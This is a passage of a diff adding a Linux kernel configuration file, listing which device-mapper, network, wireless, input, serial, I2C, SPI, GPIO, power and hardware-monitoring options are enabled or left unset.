+CONFIG_DM_MIRROR=y
+# CONFIG_DM_LOG_USERSPACE is not set
+CONFIG_DM_RAID=y
+# CONFIG_DM_ZERO is not set
+CONFIG_DM_MULTIPATH=y
+# CONFIG_DM_MULTIPATH_QL is not set
+# CONFIG_DM_MULTIPATH_ST is not set
+# CONFIG_DM_DELAY is not set
+CONFIG_DM_UEVENT=y
+# CONFIG_DM_FLAKEY is not set
+# CONFIG_DM_VERITY is not set
+# CONFIG_DM_SWITCH is not set
+# CONFIG_DM_LOG_WRITES is not set
+CONFIG_TARGET_CORE=y
+# CONFIG_TCM_IBLOCK is not set
+# CONFIG_TCM_FILEIO is not set
+# CONFIG_TCM_PSCSI is not set
+# CONFIG_TCM_USER2 is not set
+# CONFIG_LOOPBACK_TARGET is not set
+# CONFIG_ISCSI_TARGET is not set
+CONFIG_FUSION=y
+CONFIG_FUSION_SPI=y
+CONFIG_FUSION_FC=y
+CONFIG_FUSION_SAS=y
+CONFIG_FUSION_MAX_SGE=128
+# CONFIG_FUSION_CTL is not set
+# CONFIG_FUSION_LOGGING is not set
+
+#
+# IEEE 1394 (FireWire) support
+#
+# CONFIG_FIREWIRE is not set
+# CONFIG_FIREWIRE_NOSY is not set
+# CONFIG_MACINTOSH_DRIVERS is not set
+CONFIG_NETDEVICES=y
+CONFIG_MII=y
+CONFIG_NET_CORE=y
+# CONFIG_BONDING is not set
+# CONFIG_DUMMY is not set
+# CONFIG_EQUALIZER is not set
+# CONFIG_NET_FC is not set
+# CONFIG_NET_TEAM is not set
+CONFIG_MACVLAN=y
+CONFIG_MACVTAP=y
+# CONFIG_VXLAN is not set
+# CONFIG_GENEVE is not set
+# CONFIG_GTP is not set
+# CONFIG_MACSEC is not set
+CONFIG_NETCONSOLE=y
+# CONFIG_NETCONSOLE_DYNAMIC is not set
+CONFIG_NETPOLL=y
+CONFIG_NET_POLL_CONTROLLER=y
+CONFIG_TUN=y
+# CONFIG_TUN_VNET_CROSS_LE is not set
+CONFIG_VETH=y
+CONFIG_VIRTIO_NET=y
+CONFIG_NLMON=y
+# CONFIG_ARCNET is not set
+
+#
+# CAIF transport drivers
+#
+
+#
+# Distributed Switch Architecture drivers
+#
+CONFIG_ETHERNET=y
+# CONFIG_NET_VENDOR_3COM is not set
+# CONFIG_NET_VENDOR_ADAPTEC is not set
+# CONFIG_NET_VENDOR_AGERE is not set
+# CONFIG_NET_VENDOR_ALTEON is not set
+# CONFIG_ALTERA_TSE is not set
+# CONFIG_NET_VENDOR_AMAZON is not set
+# CONFIG_NET_VENDOR_AMD is not set
+# CONFIG_NET_VENDOR_ARC is not set
+# CONFIG_NET_VENDOR_ATHEROS is not set
+# CONFIG_NET_VENDOR_AURORA is not set
+# CONFIG_NET_CADENCE is not set
+# CONFIG_NET_VENDOR_BROADCOM is not set
+# CONFIG_NET_VENDOR_BROCADE is not set
+# CONFIG_NET_VENDOR_CAVIUM is not set
+# CONFIG_NET_VENDOR_CHELSIO is not set
+# CONFIG_NET_VENDOR_CISCO is not set
+# CONFIG_CX_ECAT is not set
+# CONFIG_DNET is not set
+# CONFIG_NET_VENDOR_DEC is not set
+# CONFIG_NET_VENDOR_DLINK is not set
+# CONFIG_NET_VENDOR_EMULEX is not set
+# CONFIG_NET_VENDOR_EZCHIP is not set
+# CONFIG_NET_VENDOR_EXAR is not set
+# CONFIG_NET_VENDOR_HP is not set
+# CONFIG_NET_VENDOR_INTEL is not set
+# CONFIG_JME is not set
+# CONFIG_NET_VENDOR_MARVELL is not set
+# CONFIG_NET_VENDOR_MELLANOX is not set
+# CONFIG_NET_VENDOR_MICREL is not set
+CONFIG_NET_VENDOR_MICROCHIP=y
+# CONFIG_ENC28J60 is not set
+# CONFIG_ENCX24J600 is not set
+# CONFIG_NET_VENDOR_MYRI is not set
+# CONFIG_FEALNX is not set
+# CONFIG_NET_VENDOR_NATSEMI is not set
+# CONFIG_NET_VENDOR_NETRONOME is not set
+# CONFIG_NET_VENDOR_NVIDIA is not set
+# CONFIG_NET_VENDOR_OKI is not set
+# CONFIG_ETHOC is not set
+# CONFIG_NET_PACKET_ENGINE is not set
+# CONFIG_NET_VENDOR_QLOGIC is not set
+# CONFIG_NET_VENDOR_QUALCOMM is not set
+CONFIG_NET_VENDOR_REALTEK=y
+CONFIG_8139CP=y
+CONFIG_8139TOO=y
+CONFIG_8139TOO_PIO=y
+CONFIG_8139TOO_TUNE_TWISTER=y
+CONFIG_8139TOO_8129=y
+# CONFIG_8139_OLD_RX_RESET is not set
+CONFIG_R8169=y
+# CONFIG_NET_VENDOR_RENESAS is not set
+# CONFIG_NET_VENDOR_RDC is not set
+# CONFIG_NET_VENDOR_ROCKER is not set
+# CONFIG_NET_VENDOR_SAMSUNG is not set
+# CONFIG_NET_VENDOR_SEEQ is not set
+# CONFIG_NET_VENDOR_SILAN is not set
+# CONFIG_NET_VENDOR_SIS is not set
+# CONFIG_SFC is not set
+# CONFIG_NET_VENDOR_SMSC is not set
+# CONFIG_NET_VENDOR_STMICRO is not set
+# CONFIG_NET_VENDOR_SUN is not set
+# CONFIG_NET_VENDOR_SYNOPSYS is not set
+# CONFIG_NET_VENDOR_TEHUTI is not set
+# CONFIG_NET_VENDOR_TI is not set
+# CONFIG_NET_VENDOR_VIA is not set
+# CONFIG_NET_VENDOR_WIZNET is not set
+# CONFIG_FDDI is not set
+# CONFIG_HIPPI is not set
+# CONFIG_NET_SB1000 is not set
+CONFIG_PHYLIB=y
+CONFIG_SWPHY=y
+
+#
+# MDIO bus device drivers
+#
+# CONFIG_MDIO_BCM_UNIMAC is not set
+# CONFIG_MDIO_BITBANG is not set
+# CONFIG_MDIO_BUS_MUX_GPIO is not set
+# CONFIG_MDIO_BUS_MUX_MMIOREG is not set
+# CONFIG_MDIO_HISI_FEMAC is not set
+# CONFIG_MDIO_OCTEON is not set
+# CONFIG_MDIO_THUNDER is not set
+
+#
+# MII PHY device drivers
+#
+# CONFIG_AMD_PHY is not set
+# CONFIG_AQUANTIA_PHY is not set
+# CONFIG_AT803X_PHY is not set
+# CONFIG_BCM7XXX_PHY is not set
+# CONFIG_BCM87XX_PHY is not set
+# CONFIG_BROADCOM_PHY is not set
+# CONFIG_CICADA_PHY is not set
+# CONFIG_DAVICOM_PHY is not set
+# CONFIG_DP83848_PHY is not set
+# CONFIG_DP83867_PHY is not set
+CONFIG_FIXED_PHY=y
+# CONFIG_ICPLUS_PHY is not set
+# CONFIG_INTEL_XWAY_PHY is not set
+# CONFIG_LSI_ET1011C_PHY is not set
+# CONFIG_LXT_PHY is not set
+# CONFIG_MARVELL_PHY is not set
+# CONFIG_MICREL_PHY is not set
+# CONFIG_MICROCHIP_PHY is not set
+# CONFIG_MICROSEMI_PHY is not set
+# CONFIG_NATIONAL_PHY is not set
+# CONFIG_QSEMI_PHY is not set
+# CONFIG_REALTEK_PHY is not set
+# CONFIG_SMSC_PHY is not set
+# CONFIG_STE10XP is not set
+# CONFIG_TERANETICS_PHY is not set
+# CONFIG_VITESSE_PHY is not set
+# CONFIG_XILINX_GMII2RGMII is not set
+# CONFIG_MICREL_KS8995MA is not set
+# CONFIG_PPP is not set
+# CONFIG_SLIP is not set
+# CONFIG_USB_NET_DRIVERS is not set
+CONFIG_WLAN=y
+# CONFIG_WLAN_VENDOR_ADMTEK is not set
+# CONFIG_WLAN_VENDOR_ATH is not set
+# CONFIG_WLAN_VENDOR_ATMEL is not set
+# CONFIG_WLAN_VENDOR_BROADCOM is not set
+# CONFIG_WLAN_VENDOR_CISCO is not set
+CONFIG_WLAN_VENDOR_INTEL=y
+# CONFIG_IPW2100 is not set
+# CONFIG_IPW2200 is not set
+# CONFIG_IWL4965 is not set
+# CONFIG_IWL3945 is not set
+CONFIG_IWLWIFI=y
+CONFIG_IWLWIFI_LEDS=y
+CONFIG_IWLDVM=y
+CONFIG_IWLMVM=y
+# CONFIG_IWLWIFI_BCAST_FILTERING is not set
+CONFIG_IWLWIFI_PCIE_RTPM=y
+
+#
+# Debugging Options
+#
+# CONFIG_IWLWIFI_DEBUG is not set
+# CONFIG_WLAN_VENDOR_INTERSIL is not set
+# CONFIG_WLAN_VENDOR_MARVELL is not set
+# CONFIG_WLAN_VENDOR_MEDIATEK is not set
+# CONFIG_WLAN_VENDOR_RALINK is not set
+# CONFIG_WLAN_VENDOR_REALTEK is not set
+# CONFIG_WLAN_VENDOR_RSI is not set
+# CONFIG_WLAN_VENDOR_ST is not set
+# CONFIG_WLAN_VENDOR_TI is not set
+# CONFIG_WLAN_VENDOR_ZYDAS is not set
+# CONFIG_MAC80211_HWSIM is not set
+# CONFIG_USB_NET_RNDIS_WLAN is not set
+
+#
+# Enable WiMAX (Networking options) to see the WiMAX drivers
+#
+# CONFIG_WAN is not set
+# CONFIG_VMXNET3 is not set
+# CONFIG_FUJITSU_ES is not set
+# CONFIG_ISDN is not set
+# CONFIG_NVM is not set
+
+#
+# Input device support
+#
+CONFIG_INPUT=y
+CONFIG_INPUT_LEDS=y
+# CONFIG_INPUT_FF_MEMLESS is not set
+# CONFIG_INPUT_POLLDEV is not set
+CONFIG_INPUT_SPARSEKMAP=y
+# CONFIG_INPUT_MATRIXKMAP is not set
+
+#
+# Userland interfaces
+#
+CONFIG_INPUT_MOUSEDEV=y
+CONFIG_INPUT_MOUSEDEV_PSAUX=y
+CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024
+CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768
+# CONFIG_INPUT_JOYDEV is not set
+CONFIG_INPUT_EVDEV=y
+# CONFIG_INPUT_EVBUG is not set
+
+#
+# Input Device Drivers
+#
+CONFIG_INPUT_KEYBOARD=y
+# CONFIG_KEYBOARD_ADP5588 is not set
+# CONFIG_KEYBOARD_ADP5589 is not set
+CONFIG_KEYBOARD_ATKBD=y
+# CONFIG_KEYBOARD_QT1070 is not set
+# CONFIG_KEYBOARD_QT2160 is not set
+# CONFIG_KEYBOARD_LKKBD is not set
+# CONFIG_KEYBOARD_GPIO is not set
+# CONFIG_KEYBOARD_GPIO_POLLED is not set
+# CONFIG_KEYBOARD_TCA6416 is not set
+# CONFIG_KEYBOARD_TCA8418 is not set
+# CONFIG_KEYBOARD_MATRIX is not set
+# CONFIG_KEYBOARD_LM8323 is not set
+# CONFIG_KEYBOARD_LM8333 is not set
+# CONFIG_KEYBOARD_MAX7359 is not set
+# CONFIG_KEYBOARD_MCS is not set
+# CONFIG_KEYBOARD_MPR121 is not set
+# CONFIG_KEYBOARD_NEWTON is not set
+# CONFIG_KEYBOARD_OPENCORES is not set
+# CONFIG_KEYBOARD_SAMSUNG is not set
+# CONFIG_KEYBOARD_STOWAWAY is not set
+# CONFIG_KEYBOARD_SUNKBD is not set
+# CONFIG_KEYBOARD_OMAP4 is not set
+# CONFIG_KEYBOARD_XTKBD is not set
+# CONFIG_KEYBOARD_CAP11XX is not set
+# CONFIG_KEYBOARD_BCM is not set
+CONFIG_INPUT_MOUSE=y
+CONFIG_MOUSE_PS2=y
+# CONFIG_MOUSE_PS2_ALPS is not set
+# CONFIG_MOUSE_PS2_BYD is not set
+# CONFIG_MOUSE_PS2_LOGIPS2PP is not set
+CONFIG_MOUSE_PS2_SYNAPTICS=y
+# CONFIG_MOUSE_PS2_CYPRESS is not set
+# CONFIG_MOUSE_PS2_LIFEBOOK is not set
+# CONFIG_MOUSE_PS2_TRACKPOINT is not set
+CONFIG_MOUSE_PS2_ELANTECH=y
+# CONFIG_MOUSE_PS2_SENTELIC is not set
+# CONFIG_MOUSE_PS2_TOUCHKIT is not set
+CONFIG_MOUSE_PS2_FOCALTECH=y
+# CONFIG_MOUSE_PS2_VMMOUSE is not set
+CONFIG_MOUSE_SERIAL=y
+# CONFIG_MOUSE_APPLETOUCH is not set
+# CONFIG_MOUSE_BCM5974 is not set
+# CONFIG_MOUSE_CYAPA is not set
+# CONFIG_MOUSE_ELAN_I2C is not set
+# CONFIG_MOUSE_VSXXXAA is not set
+# CONFIG_MOUSE_GPIO is not set
+CONFIG_MOUSE_SYNAPTICS_I2C=y
+CONFIG_MOUSE_SYNAPTICS_USB=y
+# CONFIG_INPUT_JOYSTICK is not set
+# CONFIG_INPUT_TABLET is not set
+# CONFIG_INPUT_TOUCHSCREEN is not set
+# CONFIG_INPUT_MISC is not set
+# CONFIG_RMI4_CORE is not set
+
+#
+# Hardware I/O ports
+#
+CONFIG_SERIO=y
+CONFIG_ARCH_MIGHT_HAVE_PC_SERIO=y
+CONFIG_SERIO_I8042=y
+CONFIG_SERIO_SERPORT=y
+# CONFIG_SERIO_CT82C710 is not set
+# CONFIG_SERIO_PCIPS2 is not set
+CONFIG_SERIO_LIBPS2=y
+CONFIG_SERIO_RAW=y
+# CONFIG_SERIO_ALTERA_PS2 is not set
+# CONFIG_SERIO_PS2MULT is not set
+# CONFIG_SERIO_ARC_PS2 is not set
+# CONFIG_SERIO_APBPS2 is not set
+# CONFIG_USERIO is not set
+# CONFIG_GAMEPORT is not set
+
+#
+# Character devices
+#
+CONFIG_TTY=y
+CONFIG_VT=y
+CONFIG_CONSOLE_TRANSLATIONS=y
+CONFIG_VT_CONSOLE=y
+CONFIG_HW_CONSOLE=y
+CONFIG_VT_HW_CONSOLE_BINDING=y
+CONFIG_UNIX98_PTYS=y
+# CONFIG_LEGACY_PTYS is not set
+# CONFIG_SERIAL_NONSTANDARD is not set
+# CONFIG_NOZOMI is not set
+# CONFIG_N_GSM is not set
+# CONFIG_TRACE_SINK is not set
+CONFIG_DEVMEM=y
+
+#
+# Serial drivers
+#
+CONFIG_SERIAL_8250=y
+CONFIG_SERIAL_8250_DEPRECATED_OPTIONS=y
+CONFIG_SERIAL_8250_PNP=y
+# CONFIG_SERIAL_8250_FINTEK is not set
+# CONFIG_SERIAL_8250_CONSOLE is not set
+CONFIG_SERIAL_8250_DMA=y
+CONFIG_SERIAL_8250_PCI=y
+CONFIG_SERIAL_8250_NR_UARTS=4
+CONFIG_SERIAL_8250_RUNTIME_UARTS=4
+# CONFIG_SERIAL_8250_EXTENDED is not set
+CONFIG_SERIAL_8250_DW=y
+# CONFIG_SERIAL_8250_RT288X is not set
+CONFIG_SERIAL_8250_LPSS=y
+CONFIG_SERIAL_8250_MID=y
+# CONFIG_SERIAL_8250_MOXA is not set
+# CONFIG_SERIAL_OF_PLATFORM is not set
+
+#
+# Non-8250 serial port support
+#
+# CONFIG_SERIAL_MAX3100 is not set
+# CONFIG_SERIAL_MAX310X is not set
+# CONFIG_SERIAL_UARTLITE is not set
+CONFIG_SERIAL_CORE=y
+# CONFIG_SERIAL_JSM is not set
+# CONFIG_SERIAL_SCCNXP is not set
+# CONFIG_SERIAL_SC16IS7XX is not set
+# CONFIG_SERIAL_ALTERA_JTAGUART is not set
+# CONFIG_SERIAL_ALTERA_UART is not set
+# CONFIG_SERIAL_IFX6X60 is not set
+# CONFIG_SERIAL_XILINX_PS_UART is not set
+# CONFIG_SERIAL_ARC is not set
+# CONFIG_SERIAL_RP2 is not set
+# CONFIG_SERIAL_FSL_LPUART is not set
+# CONFIG_SERIAL_CONEXANT_DIGICOLOR is not set
+# CONFIG_TTY_PRINTK is not set
+CONFIG_HVC_DRIVER=y
+CONFIG_VIRTIO_CONSOLE=y
+# CONFIG_IPMI_HANDLER is not set
+# CONFIG_HW_RANDOM is not set
+# CONFIG_NVRAM is not set
+# CONFIG_R3964 is not set
+# CONFIG_APPLICOM is not set
+# CONFIG_MWAVE is not set
+# CONFIG_RAW_DRIVER is not set
+CONFIG_HPET=y
+# CONFIG_HPET_MMAP is not set
+# CONFIG_HANGCHECK_TIMER is not set
+# CONFIG_TCG_TPM is not set
+# CONFIG_TELCLOCK is not set
+# CONFIG_XILLYBUS is not set
+
+#
+# I2C support
+#
+CONFIG_I2C=y
+CONFIG_ACPI_I2C_OPREGION=y
+CONFIG_I2C_BOARDINFO=y
+CONFIG_I2C_COMPAT=y
+CONFIG_I2C_CHARDEV=y
+CONFIG_I2C_MUX=y
+
+#
+# Multiplexer I2C Chip support
+#
+# CONFIG_I2C_ARB_GPIO_CHALLENGE is not set
+# CONFIG_I2C_MUX_GPIO is not set
+# CONFIG_I2C_MUX_PCA9541 is not set
+# CONFIG_I2C_MUX_PCA954x is not set
+# CONFIG_I2C_MUX_PINCTRL is not set
+CONFIG_I2C_MUX_REG=y
+# CONFIG_I2C_DEMUX_PINCTRL is not set
+CONFIG_I2C_HELPER_AUTO=y
+CONFIG_I2C_SMBUS=y
+CONFIG_I2C_ALGOBIT=y
+
+#
+# I2C Hardware Bus support
+#
+
+#
+# PC SMBus host controller drivers
+#
+# CONFIG_I2C_ALI1535 is not set
+# CONFIG_I2C_ALI1563 is not set
+# CONFIG_I2C_ALI15X3 is not set
+# CONFIG_I2C_AMD756 is not set
+# CONFIG_I2C_AMD8111 is not set
+CONFIG_I2C_I801=y
+# CONFIG_I2C_ISCH is not set
+CONFIG_I2C_ISMT=y
+# CONFIG_I2C_PIIX4 is not set
+# CONFIG_I2C_NFORCE2 is not set
+# CONFIG_I2C_SIS5595 is not set
+# CONFIG_I2C_SIS630 is not set
+# CONFIG_I2C_SIS96X is not set
+# CONFIG_I2C_VIA is not set
+# CONFIG_I2C_VIAPRO is not set
+
+#
+# ACPI drivers
+#
+CONFIG_I2C_SCMI=y
+
+#
+# I2C system bus drivers (mostly embedded / system-on-chip)
+#
+# CONFIG_I2C_CBUS_GPIO is not set
+CONFIG_I2C_DESIGNWARE_CORE=y
+CONFIG_I2C_DESIGNWARE_PLATFORM=y
+CONFIG_I2C_DESIGNWARE_PCI=y
+CONFIG_I2C_DESIGNWARE_BAYTRAIL=y
+# CONFIG_I2C_EMEV2 is not set
+# CONFIG_I2C_GPIO is not set
+# CONFIG_I2C_OCORES is not set
+# CONFIG_I2C_PCA_PLATFORM is not set
+# CONFIG_I2C_PXA_PCI is not set
+# CONFIG_I2C_RK3X is not set
+# CONFIG_I2C_SIMTEC is not set
+# CONFIG_I2C_XILINX is not set
+
+#
+# External I2C/SMBus adapter drivers
+#
+# CONFIG_I2C_DIOLAN_U2C is not set
+# CONFIG_I2C_PARPORT_LIGHT is not set
+# CONFIG_I2C_ROBOTFUZZ_OSIF is not set
+# CONFIG_I2C_TAOS_EVM is not set
+# CONFIG_I2C_TINY_USB is not set
+
+#
+# Other I2C/SMBus bus drivers
+#
+# CONFIG_I2C_STUB is not set
+CONFIG_I2C_SLAVE=y
+# CONFIG_I2C_SLAVE_EEPROM is not set
+# CONFIG_I2C_DEBUG_CORE is not set
+# CONFIG_I2C_DEBUG_ALGO is not set
+# CONFIG_I2C_DEBUG_BUS is not set
+CONFIG_SPI=y
+# CONFIG_SPI_DEBUG is not set
+CONFIG_SPI_MASTER=y
+
+#
+# SPI Master Controller Drivers
+#
+# CONFIG_SPI_ALTERA is not set
+# CONFIG_SPI_AXI_SPI_ENGINE is not set
+CONFIG_SPI_BITBANG=y
+# CONFIG_SPI_CADENCE is not set
+CONFIG_SPI_DESIGNWARE=y
+CONFIG_SPI_DW_PCI=y
+CONFIG_SPI_DW_MID_DMA=y
+CONFIG_SPI_DW_MMIO=y
+# CONFIG_SPI_GPIO is not set
+# CONFIG_SPI_FSL_SPI is not set
+# CONFIG_SPI_OC_TINY is not set
+# CONFIG_SPI_PXA2XX is not set
+# CONFIG_SPI_PXA2XX_PCI is not set
+# CONFIG_SPI_ROCKCHIP is not set
+# CONFIG_SPI_SC18IS602 is not set
+# CONFIG_SPI_XCOMM is not set
+# CONFIG_SPI_XILINX is not set
+# CONFIG_SPI_ZYNQMP_GQSPI is not set
+
+#
+# SPI Protocol Masters
+#
+# CONFIG_SPI_SPIDEV is not set
+# CONFIG_SPI_LOOPBACK_TEST is not set
+# CONFIG_SPI_TLE62X0 is not set
+CONFIG_SPMI=y
+# CONFIG_HSI is not set
+
+#
+# PPS support
+#
+CONFIG_PPS=y
+# CONFIG_PPS_DEBUG is not set
+
+#
+# PPS clients support
+#
+# CONFIG_PPS_CLIENT_KTIMER is not set
+# CONFIG_PPS_CLIENT_LDISC is not set
+# CONFIG_PPS_CLIENT_GPIO is not set
+
+#
+# PPS generators support
+#
+
+#
+# PTP clock support
+#
+CONFIG_PTP_1588_CLOCK=y
+# CONFIG_DP83640_PHY is not set
+CONFIG_PINCTRL=y
+
+#
+# Pin controllers
+#
+# CONFIG_DEBUG_PINCTRL is not set
+# CONFIG_PINCTRL_AMD is not set
+# CONFIG_PINCTRL_SINGLE is not set
+# CONFIG_PINCTRL_BAYTRAIL is not set
+# CONFIG_PINCTRL_CHERRYVIEW is not set
+# CONFIG_PINCTRL_BROXTON is not set
+# CONFIG_PINCTRL_SUNRISEPOINT is not set
+CONFIG_GPIOLIB=y
+CONFIG_OF_GPIO=y
+CONFIG_GPIO_ACPI=y
+# CONFIG_DEBUG_GPIO is not set
+# CONFIG_GPIO_SYSFS is not set
+
+#
+# Memory mapped GPIO drivers
+#
+# CONFIG_GPIO_74XX_MMIO is not set
+# CONFIG_GPIO_ALTERA is not set
+# CONFIG_GPIO_AMDPT is not set
+# CONFIG_GPIO_DWAPB is not set
+# CONFIG_GPIO_GENERIC_PLATFORM is not set
+# CONFIG_GPIO_GRGPIO is not set
+# CONFIG_GPIO_ICH is not set
+# CONFIG_GPIO_LYNXPOINT is not set
+# CONFIG_GPIO_MOCKUP is not set
+# CONFIG_GPIO_VX855 is not set
+# CONFIG_GPIO_XILINX is not set
+# CONFIG_GPIO_ZX is not set
+
+#
+# Port-mapped I/O GPIO drivers
+#
+# CONFIG_GPIO_104_DIO_48E is not set
+# CONFIG_GPIO_104_IDIO_16 is not set
+# CONFIG_GPIO_104_IDI_48 is not set
+# CONFIG_GPIO_F7188X is not set
+# CONFIG_GPIO_GPIO_MM is not set
+# CONFIG_GPIO_IT87 is not set
+# CONFIG_GPIO_SCH is not set
+# CONFIG_GPIO_SCH311X is not set
+# CONFIG_GPIO_WS16C48 is not set
+
+#
+# I2C GPIO expanders
+#
+# CONFIG_GPIO_ADP5588 is not set
+# CONFIG_GPIO_ADNP is not set
+# CONFIG_GPIO_MAX7300 is not set
+# CONFIG_GPIO_MAX732X is not set
+# CONFIG_GPIO_PCA953X is not set
+# CONFIG_GPIO_PCF857X is not set
+# CONFIG_GPIO_SX150X is not set
+# CONFIG_GPIO_TPIC2810 is not set
+# CONFIG_GPIO_TS4900 is not set
+
+#
+# MFD GPIO expanders
+#
+
+#
+# PCI GPIO expanders
+#
+# CONFIG_GPIO_AMD8111 is not set
+# CONFIG_GPIO_BT8XX is not set
+# CONFIG_GPIO_ML_IOH is not set
+# CONFIG_GPIO_RDC321X is not set
+# CONFIG_GPIO_SODAVILLE is not set
+
+#
+# SPI GPIO expanders
+#
+# CONFIG_GPIO_74X164 is not set
+# CONFIG_GPIO_MAX7301 is not set
+# CONFIG_GPIO_MC33880 is not set
+# CONFIG_GPIO_PISOSR is not set
+
+#
+# SPI or I2C GPIO expanders
+#
+# CONFIG_GPIO_MCP23S08 is not set
+
+#
+# USB GPIO expanders
+#
+CONFIG_W1=y
+CONFIG_W1_CON=y
+
+#
+# 1-wire Bus Masters
+#
+# CONFIG_W1_MASTER_MATROX is not set
+# CONFIG_W1_MASTER_DS2490 is not set
+# CONFIG_W1_MASTER_DS2482 is not set
+# CONFIG_W1_MASTER_DS1WM is not set
+# CONFIG_W1_MASTER_GPIO is not set
+
+#
+# 1-wire Slaves
+#
+CONFIG_W1_SLAVE_THERM=y
+# CONFIG_W1_SLAVE_SMEM is not set
+# CONFIG_W1_SLAVE_DS2408 is not set
+# CONFIG_W1_SLAVE_DS2413 is not set
+# CONFIG_W1_SLAVE_DS2406 is not set
+# CONFIG_W1_SLAVE_DS2423 is not set
+# CONFIG_W1_SLAVE_DS2431 is not set
+# CONFIG_W1_SLAVE_DS2433 is not set
+# CONFIG_W1_SLAVE_DS2760 is not set
+# CONFIG_W1_SLAVE_DS2780 is not set
+# CONFIG_W1_SLAVE_DS2781 is not set
+# CONFIG_W1_SLAVE_DS28E04 is not set
+# CONFIG_W1_SLAVE_BQ27000 is not set
+# CONFIG_POWER_AVS is not set
+# CONFIG_POWER_RESET is not set
+CONFIG_POWER_SUPPLY=y
+# CONFIG_POWER_SUPPLY_DEBUG is not set
+# CONFIG_PDA_POWER is not set
+# CONFIG_TEST_POWER is not set
+# CONFIG_BATTERY_DS2780 is not set
+# CONFIG_BATTERY_DS2781 is not set
+# CONFIG_BATTERY_DS2782 is not set
+# CONFIG_BATTERY_SBS is not set
+# CONFIG_BATTERY_BQ27XXX is not set
+# CONFIG_BATTERY_MAX17040 is not set
+# CONFIG_BATTERY_MAX17042 is not set
+# CONFIG_CHARGER_MAX8903 is not set
+# CONFIG_CHARGER_LP8727 is not set
+# CONFIG_CHARGER_GPIO is not set
+# CONFIG_CHARGER_BQ2415X is not set
+# CONFIG_CHARGER_BQ24190 is not set
+# CONFIG_CHARGER_BQ24257 is not set
+# CONFIG_CHARGER_BQ24735 is not set
+# CONFIG_CHARGER_BQ25890 is not set
+# CONFIG_CHARGER_SMB347 is not set
+# CONFIG_BATTERY_GAUGE_LTC2941 is not set
+# CONFIG_CHARGER_RT9455 is not set
+CONFIG_HWMON=y
+# CONFIG_HWMON_VID is not set
+# CONFIG_HWMON_DEBUG_CHIP is not set
+
+#
+# Native drivers
+#
+# CONFIG_SENSORS_ABITUGURU is not set
+# CONFIG_SENSORS_ABITUGURU3 is not set
+# CONFIG_SENSORS_AD7314 is not set
+# CONFIG_SENSORS_AD7414 is not set
+# CONFIG_SENSORS_AD7418 is not set
+# CONFIG_SENSORS_ADM1021 is not set
+# CONFIG_SENSORS_ADM1025 is not set
+# CONFIG_SENSORS_ADM1026 is not set
+# CONFIG_SENSORS_ADM1029 is not set
+# CONFIG_SENSORS_ADM1031 is not set
+# CONFIG_SENSORS_ADM9240 is not set
+# CONFIG_SENSORS_ADT7310 is not set
+# CONFIG_SENSORS_ADT7410 is not set
+# CONFIG_SENSORS_ADT7411 is not set
+# CONFIG_SENSORS_ADT7462 is not set
+# CONFIG_SENSORS_ADT7470 is not set
+# CONFIG_SENSORS_ADT7475 is not set
+# CONFIG_SENSORS_ASC7621 is not set
+# CONFIG_SENSORS_K8TEMP is not set
+# CONFIG_SENSORS_K10TEMP is not set
+# CONFIG_SENSORS_APPLESMC is not set
+# CONFIG_SENSORS_ASB100 is not set
+# CONFIG_SENSORS_ATXP1 is not set
+# CONFIG_SENSORS_DS620 is not set
+# CONFIG_SENSORS_DS1621 is not set
+# CONFIG_SENSORS_DELL_SMM is not set
+# CONFIG_SENSORS_I5K_AMB is not set
+# CONFIG_SENSORS_F71805F is not set
+# CONFIG_SENSORS_F71882FG is not set
+# CONFIG_SENSORS_F75375S is not set
+# CONFIG_SENSORS_FSCHMD is not set
+# CONFIG_SENSORS_FTSTEUTATES is not set
+# CONFIG_SENSORS_GL518SM is not set
+# CONFIG_SENSORS_GL520SM is not set
+# CONFIG_SENSORS_G760A is not set
+# CONFIG_SENSORS_G762 is not set
+# CONFIG_SENSORS_GPIO_FAN is not set
+# CONFIG_SENSORS_HIH6130 is not set
+# CONFIG_SENSORS_I5500 is not set
+CONFIG_SENSORS_CORETEMP=y
+# CONFIG_SENSORS_IT87 is not set
+# CONFIG_SENSORS_JC42 is not set
+# CONFIG_SENSORS_POWR1220 is not set
+# CONFIG_SENSORS_LINEAGE is not set
+# CONFIG_SENSORS_LTC2945 is not set
+# CONFIG_SENSORS_LTC2990 is not set
+# CONFIG_SENSORS_LTC4151 is not set
+# CONFIG_SENSORS_LTC4215 is not set
+# CONFIG_SENSORS_LTC4222 is not set
+# CONFIG_SENSORS_LTC4245 is not set
+# CONFIG_SENSORS_LTC4260 is not set
+# CONFIG_SENSORS_LTC4261 is not set
+# CONFIG_SENSORS_MAX1111 is not set
+# CONFIG_SENSORS_MAX16065 is not set
+# CONFIG_SENSORS_MAX1619 is not set
+# CONFIG_SENSORS_MAX1668 is not set
+# CONFIG_SENSORS_MAX197 is not set
+# CONFIG_SENSORS_MAX31722 is not set
+# CONFIG_SENSORS_MAX6639 is not set
+# CONFIG_SENSORS_MAX6642 is not set
+# CONFIG_SENSORS_MAX6650 is not set
+# CONFIG_SENSORS_MAX6697 is not set
+# CONFIG_SENSORS_MAX31790 is not set
+# CONFIG_SENSORS_MCP3021 is not set
+# CONFIG_SENSORS_ADCXX is not set
+# CONFIG_SENSORS_LM63 is not set
+# CONFIG_SENSORS_LM70 is not set
+# CONFIG_SENSORS_LM73 is not set
+# CONFIG_SENSORS_LM75 is not set
+# CONFIG_SENSORS_LM77 is not set
+# CONFIG_SENSORS_LM78 is not set
+# CONFIG_SENSORS_LM80 is not set
+# CONFIG_SENSORS_LM83 is not set
+# CONFIG_SENSORS_LM85 is not set
+# CONFIG_SENSORS_LM87 is not set
+# CONFIG_SENSORS_LM90 is not set
+# CONFIG_SENSORS_LM92 is not set
+# CONFIG_SENSORS_LM93 is not set
+# CONFIG_SENSORS_LM95234 is not set
+# CONFIG_SENSORS_LM95241 is not set
+# CONFIG_SENSORS_LM95245 is not set
+# CONFIG_SENSORS_PC87360 is not set
+# CONFIG_SENSORS_PC87427 is not set
+# CONFIG_SENSORS_NTC_THERMISTOR is not set
+# CONFIG_SENSORS_NCT6683 is not set
+# CONFIG_SENSORS_NCT6775 is not set
+# CONFIG_SENSORS_NCT7802 is not set
+# CONFIG_SENSORS_NCT7904 is not set
+# CONFIG_SENSORS_PCF8591 is not set
+# CONFIG_PMBUS is not set
+# CONFIG_SENSORS_SHT15 is not set
+# CONFIG_SENSORS_SHT21 is not set
+# CONFIG_SENSORS_SHT3x is not set
+# CONFIG_SENSORS_SHTC1 is not set
+# CONFIG_SENSORS_SIS5595 is not set
